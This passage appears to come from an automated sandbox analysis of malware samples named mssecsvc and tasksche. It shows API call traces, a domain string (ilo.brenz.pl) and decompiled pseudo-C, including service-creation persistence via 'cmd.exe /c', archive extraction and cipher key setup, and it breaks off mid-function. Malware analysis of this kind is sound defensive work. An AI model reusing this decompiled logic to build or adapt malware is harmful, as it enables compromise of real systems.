                                                                                  • Part of subcall function 00A83F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                  • Part of subcall function 00A83F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00A84057
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00A841B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00A86AA2,00000000,00000000), ref: 00A841BD
                                                                                • GetTickCount.KERNEL32 ref: 00A841F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleLibraryLoadThread$CountEventTickVersionlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2925003024-0
                                                                                • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                • Instruction ID: 917e7c3747ee5ab01a919b876377117f209b175af149b6bd464110256128bfb6
                                                                                • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                • Instruction Fuzzy Hash: 1781F071508259BFEB21AF348C5DBEA7FACEF45310F040658E8898E182D2F45F45C762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A82768 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000104), ref: 00A8278C
                                                                                  • Part of subcall function 00A827A7: GetTempFileNameA.KERNEL32(?,00A827A3,00000000,?), ref: 00A827A8
                                                                                  • Part of subcall function 00A827A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00A827A3,00000000,?), ref: 00A827C3
                                                                                  • Part of subcall function 00A827A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00A827A3,00000000,?), ref: 00A827F3
                                                                                  • Part of subcall function 00A827A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00A827A3,00000000,?), ref: 00A827FF
                                                                                  • Part of subcall function 00A827A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00A827A3), ref: 00A82823
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3982275768-0
                                                                                • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                • Instruction ID: 037299d7ff9a6957ff75b9c7b1e999953bbd54de474f5e15e2a2738386f37410
                                                                                • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                • Instruction Fuzzy Hash: E021AFB1144206BFE7216B21CC8EFFF7A2DEF95B10F000529FA4999082D7B19E5587B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A827A7 Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempFileNameA.KERNEL32(?,00A827A3,00000000,?), ref: 00A827A8
                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00A827A3,00000000,?), ref: 00A827C3
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00A827A3,00000000,?), ref: 00A827F3
                                                                                • CloseHandle.KERNEL32(?,00000104,?,00000000,?,00A827A3,00000000,?), ref: 00A827FF
                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00A827A3), ref: 00A82823
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Create$CloseHandleNameProcessTempWrite
                                                                                • String ID:
                                                                                • API String ID: 463619559-0
                                                                                • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction ID: d5626a4c4e84ee79db7dcc049fbb365618b369fde020026eace35120b98ab0f4
                                                                                • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction Fuzzy Hash: 8D116DB1100606BBEB251B21CC4AFFB7A2DEF94B10F004519FA0699080DBF59E5196A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A810CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(0019FE90), ref: 00A8113D
                                                                                • GetProcAddress.KERNEL32(00000000,00A811D6), ref: 00A81148
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: .DLL
                                                                                • API String ID: 1646373207-899428287
                                                                                • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                • Instruction ID: 616aa10682b1015e67deb05c9b4bf70b6b0e21a0ca3b51cd5b3f9e8d82d0985f
                                                                                • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                • Instruction Fuzzy Hash: 5E01C030A07000EA8F64BF6CCC4DAEA7B7CEF04351F004218EA1A8B256C7708E828795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				unsigned int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				char _t142;
				char _t150;
				void* _t151;
				signed char _t156;
				long _t173;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				unsigned int _t210;
				char _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				void* _t263;
				unsigned int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				char* _t274;
				unsigned int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;
				intOrPtr _t282;

				_t263 = __edx;
				_t213 = __ecx;
				_t272 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t272 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E00406A97(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
					if(_t272 != _t208) {
						_t132 =  *_t280;
						if(_t272 >=  *( *_t280 + 0x10)) {
							L12:
							_t133 =  *_t280;
							if( *( *_t280 + 0x10) >= _t272) {
								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L00407700();
									_v12 = _t142;
									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t209 = __imp___mbsstr;
										_t274 =  &_v644;
										while(1) {
											L21:
											_t150 =  *_t274;
											if(_t150 != 0 && _t274[1] == 0x3a) {
												break;
											}
											if(_t150 == 0x5c || _t150 == 0x2f) {
												_t274 =  &(_t274[1]);
												continue;
											} else {
												_t151 =  *_t209(_t274, "\\..\\");
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}


















































                                                                                0x00406c40
                                                                                0x00406c40
                                                                                0x00406c4c
                                                                                0x00406c4f
                                                                                0x00406c52
                                                                                0x00406c56
                                                                                0x00406c59
                                                                                0x00407064
                                                                                0x00000000
                                                                                0x00407064
                                                                                0x00406c5f
                                                                                0x00406c64
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406c6d
                                                                                0x00406c70
                                                                                0x00406c75
                                                                                0x00406c75
                                                                                0x00406c7c
                                                                                0x00406c7f
                                                                                0x00406ca0
                                                                                0x00406cec
                                                                                0x00406cf1
                                                                                0x00406cfa
                                                                                0x00406cfa
                                                                                0x00406cff
                                                                                0x00406d21
                                                                                0x00406d3e
                                                                                0x00406d52
                                                                                0x00406d5c
                                                                                0x00406d89
                                                                                0x00000000
                                                                                0x00406d89
                                                                                0x00406d5e
                                                                                0x00406d61
                                                                                0x00406d68
                                                                                0x00406d7e
                                                                                0x00406d95
                                                                                0x00406d9b
                                                                                0x00406dab
                                                                                0x00406db0
                                                                                0x00406db8
                                                                                0x00406dbe
                                                                                0x00406dbe
                                                                                0x00406dbe
                                                                                0x00406dc2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406dd0
                                                                                0x00406dd6
                                                                                0x00000000
                                                                                0x00406dd9
                                                                                0x00406ddf
                                                                                0x00406de5
                                                                                0x00406e11
                                                                                0x00406e11
                                                                                0x00406e11
                                                                                0x00000000
                                                                                0x00406e11
                                                                                0x00406ded
                                                                                0x00406df3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406dfb
                                                                                0x00406e01
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e09
                                                                                0x00406e0f
                                                                                0x00406e1b
                                                                                0x00406e20
                                                                                0x00406e28
                                                                                0x00406e2c
                                                                                0x00406e3c
                                                                                0x00406e3e
                                                                                0x00406e41
                                                                                0x00406e44
                                                                                0x00406e46
                                                                                0x00406e61
                                                                                0x00406e6b
                                                                                0x00406e6d
                                                                                0x00406e78
                                                                                0x00406e7a
                                                                                0x00406e7c
                                                                                0x00406e7c
                                                                                0x00406e7e
                                                                                0x00406e82
                                                                                0x00406e88
                                                                                0x00406e8a
                                                                                0x00406e8a
                                                                                0x00406e96
                                                                                0x00406e98
                                                                                0x00406e98
                                                                                0x00406ea3
                                                                                0x00406ea5
                                                                                0x00406ea5
                                                                                0x00406eae
                                                                                0x00406eb0
                                                                                0x00406eb0
                                                                                0x00406ebb
                                                                                0x00406ebd
                                                                                0x00406ebd
                                                                                0x00406eca
                                                                                0x00406ed3
                                                                                0x00406ee6
                                                                                0x00406ef2
                                                                                0x00406ef5
                                                                                0x00406efb
                                                                                0x00406efe
                                                                                0x00406f05
                                                                                0x00406f08
                                                                                0x00406f0e
                                                                                0x00406f14
                                                                                0x00406f1a
                                                                                0x00406f20
                                                                                0x00406f26
                                                                                0x00406f2c
                                                                                0x00407037
                                                                                0x00407039
                                                                                0x0040703b
                                                                                0x0040703c
                                                                                0x00407041
                                                                                0x00407048
                                                                                0x0040704f
                                                                                0x0040705a
                                                                                0x00000000
                                                                                0x00406f32
                                                                                0x00406f32
                                                                                0x00406f3a
                                                                                0x00406f41
                                                                                0x00406f45
                                                                                0x00406f4d
                                                                                0x00406f5d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f62
                                                                                0x00406f6c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f6e
                                                                                0x00406f73
                                                                                0x00406f81
                                                                                0x00406f86
                                                                                0x00406f89
                                                                                0x00406f8f
                                                                                0x00406f92
                                                                                0x00406f94
                                                                                0x00406f99
                                                                                0x00406f9e
                                                                                0x00406fba
                                                                                0x00406fc0
                                                                                0x00406fc4
                                                                                0x00406fc4
                                                                                0x00406fcc
                                                                                0x00406fce
                                                                                0x00406fd3
                                                                                0x00406fd8
                                                                                0x00406ff4
                                                                                0x00406ffb
                                                                                0x00406ffb
                                                                                0x00407005
                                                                                0x00407007
                                                                                0x0040702a
                                                                                0x00407031
                                                                                0x00407031
                                                                                0x00000000
                                                                                0x00407005
                                                                                0x00406f2c
                                                                                0x00000000
                                                                                0x00406e0f
                                                                                0x00406dd0
                                                                                0x00406dcb
                                                                                0x00000000
                                                                                0x00406dcb
                                                                                0x00406d80
                                                                                0x00406d83
                                                                                0x00000000
                                                                                0x00406d88
                                                                                0x00000000
                                                                                0x00406d40
                                                                                0x00406d02
                                                                                0x00406cf9
                                                                                0x00406cf9
                                                                                0x00000000
                                                                                0x00406cf9
                                                                                0x00406cf4
                                                                                0x00000000
                                                                                0x00406cf4
                                                                                0x00000000
                                                                                0x00406c81
                                                                                0x00406c83
                                                                                0x00406ca2
                                                                                0x00406ca7
                                                                                0x00406caa
                                                                                0x00406cae
                                                                                0x00406cb1
                                                                                0x00406cb7
                                                                                0x00406cbd
                                                                                0x00406cc3
                                                                                0x00406cc9
                                                                                0x00406ccf
                                                                                0x00406cd5
                                                                                0x00406cdb
                                                                                0x00406ce1
                                                                                0x00407060
                                                                                0x00000000
                                                                                0x00407060
                                                                                0x00406c91
                                                                                0x00000000
                                                                                0x00406c96

                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: /../$/..\$\../$\..\
                                                                                • API String ID: 3510742995-3885502717
                                                                                • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                                                • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                                                                                • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                                                • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401CE8(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v1040;
				void* _t12;
				void* _t13;
				void* _t31;
				int _t32;

				_v12 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_v8 = _t12;
				if(_t12 != 0) {
					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
					_v16 = _t13;
					if(_t13 == 0) {
						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
						if(_t31 != 0) {
							StartServiceA(_t31, 0, 0);
							CloseServiceHandle(_t31);
							_v12 = 1;
						}
						_t32 = _v12;
					} else {
						StartServiceA(_t13, 0, 0);
						CloseServiceHandle(_v16);
						_t32 = 1;
					}
					CloseServiceHandle(_v8);
					return _t32;
				}
				return 0;
			}











                                                                                0x00401cfb
                                                                                0x00401cfe
                                                                                0x00401d06
                                                                                0x00401d09
                                                                                0x00401d21
                                                                                0x00401d29
                                                                                0x00401d2c
                                                                                0x00401d54
                                                                                0x00401d7b
                                                                                0x00401d7f
                                                                                0x00401d84
                                                                                0x00401d8b
                                                                                0x00401d91
                                                                                0x00401d91
                                                                                0x00401d98
                                                                                0x00401d2e
                                                                                0x00401d31
                                                                                0x00401d3a
                                                                                0x00401d42
                                                                                0x00401d42
                                                                                0x00401d9e
                                                                                0x00000000
                                                                                0x00401da7
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                                                                                • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandleOpen$ManagerStart
                                                                                • String ID: cmd.exe /c "%s"
                                                                                • API String ID: 1485051382-955883872
                                                                                • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                                                • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                                                                                • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                                                • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 54%
                                                                                			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
				signed int _v8;
				signed int _v12;
				char _v24;
				int _t193;
				signed int _t198;
				int _t199;
				intOrPtr _t200;
				signed int* _t205;
				signed char* _t206;
				signed int _t208;
				signed int _t210;
				signed int* _t216;
				signed int _t217;
				signed int* _t220;
				signed int* _t229;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t289;
				signed int _t290;
				signed char* _t291;
				signed int _t292;
				void* _t303;
				void* _t313;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char* _t317;
				signed char* _t319;
				signed int _t320;
				signed int _t322;
				void* _t326;
				void* _t327;
				signed int _t329;
				signed int _t337;
				intOrPtr _t338;
				signed int _t340;
				intOrPtr _t341;
				void* _t342;
				signed int _t345;
				signed int* _t346;
				signed int _t347;
				void* _t352;
				void* _t353;
				void* _t354;

				_t352 = __ecx;
				if(_a4 == 0) {
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t283 = _a12;
				_t252 = 0x18;
				_t342 = 0x10;
				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t193 = _a16;
				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_t193 =  &_v24;
					_push(0x40d570);
					_push(_t193);
					L0040776E();
				}
				 *(_t352 + 0x3cc) = _t193;
				 *(_t352 + 0x3c8) = _t283;
				memcpy(_t352 + 0x3d0, _a8, _t193);
				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
				_t198 =  *(_t352 + 0x3c8);
				_t354 = _t353 + 0x18;
				if(_t198 == _t342) {
					_t199 =  *(_t352 + 0x3cc);
					if(_t199 != _t342) {
						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
					} else {
						_t200 = 0xa;
					}
					goto L17;
				} else {
					if(_t198 == _t252) {
						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
						L17:
						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
						L18:
						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
